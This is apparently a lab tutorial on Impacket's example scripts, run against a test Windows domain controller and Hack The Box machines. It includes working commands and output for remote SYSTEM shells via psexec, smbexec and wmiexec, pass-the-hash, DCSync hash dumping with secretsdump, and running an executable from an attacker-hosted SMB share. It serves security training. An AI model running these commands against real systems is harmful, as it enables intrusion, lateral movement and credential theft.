Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC). According to the Core Security Website, Impacket supports protocols like IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI, LDAP etc.
For the following practical we will require two systems,
- A Windows Server with Domain Controller Configured
- A Kali Linux
Here, in our lab scenario we have configured the following settings on our systems.
Windows Server Details
- Domain: SERVER
- User: Administrator
- Password: T00r
- IP Address: 192.168.1.140
Kali Linux: 192.168.1.135
Before beginning with the Impacket tools, let’s do a Nmap version scan on the target windows server to get the information about the services running on the Windows Server.
nmap –sV 192.168.1.140
As you can see in the above screenshot, we have domain services, Kerberos Services, Netbios Services, LDAP services and Windows RPC services.
Now let’s install the Impacket tools from GitHub. You can get it from here.
Firstly, clone the git, and then install the Impacket as shown in the screenshot.
git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python setup.py install
This will install Impacket on your Kali Linux, now after installation let’s look at what different tools does Impacket have in its box.
cd impacket/examples
These are the some of the tools included in impacket, let’s try some of them.
Ping.py
Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.
./ping.py
Syntax: ./ping.py [Source IP] [Destination IP]
./ping.py 192.168.1.135 192.168.1.140
Lookupsid.py
A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
./lookupsid.py
Syntax: ./lookupsid.py [[domain/] username [: password] @] [Target IP Address]
./lookupsid.py SERVER/Administrator:T00r@192.168.1.140
As you can see that the lookupsid tool had extracted the user and group information from the server
Psexec.py
It lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.
./psexec.py
root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] Requesting shares on 10.10.10.82..... [*] Found writable share ADMIN$ [*] Uploading file JbNIPTbN.exe [*] Opening SVCManager on 10.10.10.82..... [*] Creating service cKNz on 10.10.10.82..... [*] Starting service cKNz..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]
/psexec.py SERVER/Administrator:T00r@192.168.1.140
As you can see that we got a remote shell of the server in the given screenshot (note if last character of password = ! you get an error : bash: !@192.168.178.200: event not found )
Rpcdump.py
This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.
./rpcdump.py
Syntax: ./rpcdump.py [[domain/] username [: password] @] [Target IP Address]
./rpcdump.py SERVER/Administrator:T00r@192.168.1.140
As you can see below we have the list of RPC targets
Samrdump.py
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
./samrdump.py
Syntax: ./samrdump.py [[domain/] username [: password] @] [Target IP Address]
./samrdump.py SERVER/Administrator:T00r@192.168.1.140
Secretsdump.py
root@kali:~/htb/hercules# python secretsdump.py -just-dc-ntlm HTB.LOCAL/puckie@192.168.178.24 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3::: puckie:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef::: [*] Cleaning up...
SMBexec.py
It generates a semi-interactive shell, . It does not require to install any service/agent at the target server. It’s stealth and runs as Administrator.
./smbexec.py
E:\OSCP>smbexec -hashes 566EFC084E3FCCB7B4DF6D823C906E54:566EFC084E3FCCB7B4DF6D823C906E54 administrator@192.168.178.24 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>whoami nt authority\system
SMBserver.py
root@kali:~/htb/dropzone/share# impacket-smbserver share ./ Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed c:\windows\system32>\\10.10.14.19\share\whoami.exe \\10.10.14.19\share\whoami.exe NT AUTHORITY\SYSTEM c:\windows\system32>copy \\10.10.14.19\share\whoami.exe copy \\10.10.14.19\share\whoami.exe 1 file(s) copied. KALI htb/tally# impacket-smbserver share ./ -smb2support LT-JACCO GroupPolicy Editor : Enable insecure guest logons Within the latest “Windows 10 Fall Creators Update” the Guest access in SMB2 is disabled by default. You can change this setting within your group policy settings. Within the run box, type “gpedit.msc” Within the local Group Policy Editor, select “Administrative Templates” Resolution If you want to enable insecure guest access, you can configure the following Group Policy settings: Computer configuration\administrative templates\network\Lanman Workstation "Enable insecure guest logons" Select OK
Sniff.py
Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.
. /sniff.py
Choose the interface using the number associated with it. And the sniffing starts.
Sniffer.py
Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.
. /sniffer.py
And the sniffer starts to monitor icmp, tcp and udp
Wmiexec.py
It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. It runs as Administrator. It is highly stealthy.
./wmiexec.py
root@kali:~/htb/silo# python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami silo\administrator
Syntax: ./wmiexec.py [[domain/] username [: password] @] [Target IP Address]
./wmiexec.py SERVER/Administrator:T00r@192.168.1.140
As you can se below that we have the shell from the Target Server
Wmiquery.py
It allows to issue WQL queries and get description of WMI objects at the target system.
./wmiquery.py
Syntax: ./wmiquery.py [[domain/] username [: password] @] [Target IP Address]
./wmiquery.py SERVER/Administrator:T00r@192.168.1.140
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152
Atexec.py
This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
./atexec.py
Syntax: /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]
./atexec.py SERVER/Administrator:T00r@192.168.1.140 systeminfo
getArch.py
This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab) using a documented MSRPC feature.
./getArch.py
Syntax: ./getArch.py -target [IP Address]
Command: ./getArch.py -target 192.168.1.140
Here we can see that the architecture of the target system is 64-bit
Ifmap
This script will bind to the target’s MGMT interface to get a list of interface IDs. It will use that list on top of another list of interfaces UUID and reports whether the interface is listed and/or listening.
Syntax: ./ifmap.py [Host IP Address] [Port]
./ifmap.py 192.168.1.140 135 ./ifmap.py 192.168.1.140 49154
mssqlclient.py
This script will connect against a target (or list of targets) machine/s
root@kali:~/htb/# python mssqlclient.py Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target TDS client implementation (SSL supported). positional arguments: target [[domain/]username[:password]@]<targetName or address> optional arguments: -h, --help show this help message and exit -port PORT target MSSQL port (default 1433) -db DB MSSQL database instance (default None) -windows-auth whether or not to use Windows Authentication (default False) -debug Turn DEBUG output ON -file FILE input file with commands to execute in the SQL shell authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -no-pass don't ask for password (useful for -k) -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits) -dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
Example: .mssqlclient.py -windows-auth htb.local/mssql-svc@10.10.x.x
Author: Jacco Straathof